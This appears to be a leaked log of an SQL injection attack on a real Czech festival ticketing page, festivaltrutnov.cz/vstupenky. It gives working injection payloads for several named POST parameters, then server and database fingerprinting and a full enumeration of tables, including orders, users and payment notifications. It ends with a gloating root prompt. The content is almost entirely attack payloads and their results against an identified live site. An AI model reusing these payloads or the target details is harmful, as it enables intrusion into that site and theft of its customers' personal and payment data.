- === SQL Injection
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: akcecenikCZK
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- === Boolean Based SQL Injection
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: akcecenikCZK
- Parameter Type: Post
- Attack Pattern: -1 OR 17-7=10
- === [High Possibility] SQL Injection
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: akcecenikCZK
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cp
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: mesto
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Analyzing http://festivaltrutnov.cz/vstupenky with 10 input parameter(s)
- Test parameter: stat
- Host IP: 127.0.0.1 (Proxy IP)
- Web Server: Apache/2.2.22 (Debian)
- Powered-by: PHP/5.4.45-0+deb7u2
- DB Server: MySQL
- Current DB: festivaltrutnovcz
- Table found: aktuality
- Table found: aktualityen
- Table found: bands
- Table found: bands11
- Table found: cenikvstupenek
- Table found: cenikvstupenek_2014
- Table found: cenikvstupenek_2015
- Table found: cenikvstupenek_2016
- Table found: forum
- Table found: fotky
- Table found: fotogalerie
- Table found: galerie
- Table found: galerie_nadpisy
- Table found: gopay_notifikace
- Table found: kategorie
- Table found: mayal2014
- Table found: menu
- Table found: menu10
- Table found: menu2010
- Table found: objednavka
- Table found: objednavka_polozky
- Table found: objednavky
- Table found: obrazky
- Table found: obsah
- Table found: obsah2010
- Table found: portal
- Table found: press_web
- Table found: refererstat
- Table found: sez_vstupenky
- Table found: uzivatele
- Table found: video
- Table found: viewstat
- Table found: vstupenky
- Table found: vstupenky10
- Table found: vstupenky2012
- Table found: vstupenky2013
- Table found: vstupenky2014
- Table found: vstupenky2015
- Table found: vstupenky2016
- Table found: wp11_newsletter_users
- Table found: zbozi
- Table found: zbozi_atributy
- Table found: zbozi_atributy_hodnoty
- Table found: zbozi_sklad
- root@subgraph:~# :)